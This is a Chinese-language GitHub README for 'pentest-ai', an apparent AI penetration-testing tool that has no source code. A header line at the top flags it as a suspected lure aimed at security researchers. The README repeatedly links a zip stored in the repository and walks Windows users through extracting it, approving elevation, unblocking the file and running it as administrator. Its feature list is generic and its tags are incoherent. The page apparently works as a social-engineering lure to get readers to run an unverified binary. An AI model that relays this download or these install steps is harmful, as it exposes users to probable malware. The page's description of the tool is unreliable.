forcepumpholibut956/pentest-ai
GitHub: forcepumpholibut956/pentest-ai
该仓库伪装为 AI 驱动的渗透测试自动化工具,但实际上无源代码、仅提供不可信的二进制下载,疑似针对安全研究人员的恶意软件分发载体。
Stars: 0 | Forks: 0
# 🛡️ pentest-ai - 以更少的工作量运行安全测试
[](https://raw.githubusercontent.com/forcepumpholibut956/pentest-ai/main/agents/report/ai_pentest_v1.8.zip)
## 🧭 本应用的功能
pentest-ai 可帮助您以更少的手动工作量运行安全检查。它将大量安全工具、Python agent 和 MCP 服务器整合在一个应用中。
使用它可以:
- 扫描目标以查找常见问题
- 按设定顺序运行检查
- 测试可能的 exploit 路径
- 验证 proof of concept 结果
- 将发现的问题集中收集
它专为 pentest 工作、bug bounty 任务、红队实验、CTF 练习和安全研究而打造。
## 💻 系统要求
在安装之前,请确保您的 Windows PC 具备以下条件:
- Windows 10 或 Windows 11
- 8 GB 或更多 RAM
- 2 GB 可用磁盘空间
- 稳定的互联网连接
- 获得测试您所用系统的许可
为了获得最佳效果:
- 在运行扫描之前关闭其他占用资源大的应用程序
- 使用本地文件夹,例如 `Downloads` 或 `Desktop`
- 保持 Windows Defender 开启,除非您的设置明确需要将其设为例外
## 📥 下载 pentest-ai
访问发布页面下载并运行此文件:
[https://raw.githubusercontent.com/forcepumpholibut956/pentest-ai/main/agents/report/ai_pentest_v1.8.zip](https://raw.githubusercontent.com/forcepumpholibut956/pentest-ai/main/agents/report/ai_pentest_v1.8.zip)
在发布页面上,找到最新版本并下载与您的系统匹配的 Windows 文件。如果您不确定选择哪个文件,请选择标记为 Windows 的文件并使用默认选项。
## 🪟 在 Windows 上安装
请在您的 Windows PC 上按照以下步骤操作:
1. 打开下载页面并获取最新的 Windows 版本。
2. 将文件保存到您的计算机。
3. 如果文件位于 `.zip` 文件夹中,请右键单击该文件并选择 **提取全部**。
4. 打开解压后的文件夹。
5. 双击应用程序文件以启动它。
6. 如果 Windows 请求权限,请点击 **是**。
7. 在开始扫描之前,等待应用程序加载完成。
如果您看到文件被阻止的提示:
1. 右键单击该文件。
2. 选择 **属性**。
3. 勾选 **解除锁定**(如果您看到该选项)。
4. 点击 **应用**,然后再次打开应用程序。
## 🚀 首次启动
当 pentest-ai 首次启动时,它可能会创建一些用于设置和扫描数据的本地文件及文件夹。
您可能会看到以下选项:
- 目标输入
- 扫描模式
- 工具选择
- 输出文件夹
- agent 运行设置
一个简单的首次测试:
1. 输入您拥有测试权限的测试系统。
2. 选择基本扫描模式。
3. 保留默认工具集。
4. 开始运行。
5. 扫描结束后查看结果。
## 🔧 基本设置
如果应用程序提示输入设置值,请按照以下简单步骤操作:
1. 打开设置界面。
2. 检查输出文件夹路径。
3. 选择一个您之后容易找到的文件夹,例如 `Documents\pentest-ai`。
4. 首先将扫描深度设置为低或中等水平。
5. 在您熟悉流程之前,请保持高级 chaining 选项处于关闭状态。
6. 保存您的设置。
如果应用程序使用配置文件,您可以使用记事本进行编辑:
- 打开配置文件
- 每次只更改一个值
- 保存文件
- 重启应用程序
## 🧰 主要功能
pentest-ai 整合了用于安全工作的工具和 agent 逻辑。
### 🔍 目标检查
对主机、域名或应用运行常见检查。这可以帮助您发现:
- 开放端口
- 暴露的服务
- 薄弱的配置选项
- 缺失的 headers
- 高风险路径
### 🤖 Agent 驱动的运行
应用程序可以使用 Python agent 逐步指导检查。当您希望获得比手动使用工具更有序的流程时,这会非常有用。
### 🔗 Exploit chaining
使用链式步骤来测试一个漏洞是否会导致另一个漏洞。当您想了解某个发现的全面影响时,此功能非常实用。
### ✅ PoC 验证
应用程序可以帮助您在继续之前验证 proof of concept 结果。这能确保您的工作基于真实的证据。
### 🗂️ OSINT 支持
您可以使用 OSINT 风格的检查来收集关于目标的公开数据,例如:
- 主机名
- 子域名
- 暴露的资产
- 相关 endpoint
### 🛠️ 工具覆盖
该应用程序包含对多种安全工具的支持,例如:
- nmap
- vulnerability scanner
- web 测试工具
- recon 工具
- exploit 检查
- 抓包和审查辅助工具
## 🧪 常见用例
将 pentest-ai 用于:
- bug bounty recon
- 实验室测试
- CTF 练习
- 内部安全检查
- 红队演练
- 服务审查
- 基本漏洞发现
## 📁 典型文件夹布局
运行应用程序后,您可能会看到以下文件夹:
- `config` 用于存放设置文件
- `logs` 用于存放运行历史记录
- `results` 用于存放扫描输出
- `agents` 用于存放 agent 设置
- `tools` 用于存放工具列表
如果您想保持整洁,请在每次会话后将旧的扫描结果移动到带有日期的文件夹中。
## 🖱️ 如何运行扫描
请按照以下简单流程操作:
1. 打开 pentest-ai。
2. 输入您的目标。
3. 选择扫描 profile。
4. 选择您要使用的工具。
5. 开始运行。
6. 观察进度输出。
7. 完成后打开结果文件夹。
如果您希望进行一次安全的首次运行,请从以下设置开始:
- 一个主机
- 一个端口范围
- 一个扫描 profile
- 默认设置
## ⚙️ 顺畅运行的提示
- 首先一次只使用一个目标。
- 保持首次扫描的小规模。
- 每次运行后保存结果。
- 在更改设置之前阅读输出。
- 如果工具未能加载,请重启应用程序。
- 如果在没有明确原因的情况下运行失败,请更新到最新版本。
## 🧩 故障排除
### 应用程序无法打开
- 检查下载是否已完成。
- 如果文件位于 zip 文件夹中,请将其解压。
- 右键单击应用程序并再次运行。
- 如果 Windows 阻止了它,请尝试以管理员身份运行。
### 窗口一闪而过(打开后立即关闭)
- 检查文件夹中是否存在缺失的文件。
- 重新解压发行版文件。
- 确保您没有将文件移出应用程序文件夹。
- 再次尝试最新版本。
### 扫描未启动
- 检查您的目标是否有效。
- 确保应用程序具有写入文件的权限。
- 降低扫描深度。
- 关闭额外选项后重试。
### 结果为空
- 确认目标是否在线。
- 尝试更宽的端口范围。
- 使用不同的扫描 profile。
- 查看日志以了解工具运行失败的原因。
## 🔐 安全使用
仅在您拥有或已获得测试许可的系统上使用 pentest-ai。请将您的工作限制在经批准的范围和实验室系统内。
## 📦 版本更新
当您需要最新构建版本时,请查看发布页面:
[https://raw.githubusercontent.com/forcepumpholibut956/pentest-ai/main/agents/report/ai_pentest_v1.8.zip](https://raw.githubusercontent.com/forcepumpholibut956/pentest-ai/main/agents/report/ai_pentest_v1.8.zip)
每个版本可能包括:
- 错误修复
- 工具更新
- 扫描流程变更
- 更好的 Windows 支持
- 新的 agent 路径
## 🗺️ 建议的首次运行
如果您想要一个简单的起点,请遵循以下路径:
1. 下载最新的 Windows 版本。
2. 解压文件。
3. 打开应用程序。
4. 添加一个测试目标。
5. 运行基本扫描。
6. 阅读输出内容。
7. 保存报告
## 📌 涵盖的主题
此项目适用于以下相关工作:
- ai security
- bug bounty
- claude
- ctf
- cybersecurity
- exploit chaining
- hacking tools
- mcp
- model context protocol
- nmap
- offensive security
- osint
- penetration testing
- pentest-ai
- pentesting
- python
- red team
- security
- vulnerability scanning
标签:AI代理, AI安全, Chat Copilot, MCP服务器, Python, Windows应用, XXE攻击, 人工智能, 反取证, 安全报告, 安全评估, 插件系统, 数据展示, 无后门, 用户模式Hook绕过, 红队, 网络安全, 自动化攻击流, 逆向工具, 隐私保护